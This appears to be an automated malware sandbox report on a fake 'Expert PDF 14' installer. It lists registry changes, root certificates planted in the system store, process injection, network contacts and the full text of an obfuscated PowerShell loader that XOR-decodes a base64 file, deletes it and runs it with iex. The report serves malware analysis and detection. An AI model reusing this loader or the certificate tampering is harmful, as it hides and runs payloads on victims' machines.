Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\ = "Installer Class" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\ = "IGeoIPStruct" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0C65FB04-3503-4B15-A148-8904F9450F50}\Version\ = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7EAF85B3-F511-4B8D-8731-95015ACED100}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ = "IStartItemModule" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA738FC0-B58C-4717-BF65-F2034D0ABC09}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F0943358-2D26-4A19-A9DF-C949F475DDE3} C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\ = "DownloadItemMonetization Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = (binary certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = (binary certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnk C:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 3672 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
PID 116 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 116 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
PID 3672 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$C004A,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

"C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"

C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

"C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe" /RegServer

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 199.176.139.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 33.146.190.20.in-addr.arpa udp
US 8.8.8.8:53 api-updateservice.expert-pdf.com udp
CA 64.15.159.225:443 api-updateservice.expert-pdf.com tcp
US 8.8.8.8:53 225.159.15.64.in-addr.arpa udp
US 8.8.8.8:53 52.212.199.91.in-addr.arpa udp
US 8.8.8.8:53 68.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 wsgeoip.expert-pdf.com udp
CA 64.15.159.225:443 wsgeoip.expert-pdf.com tcp
US 8.8.8.8:53 188.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
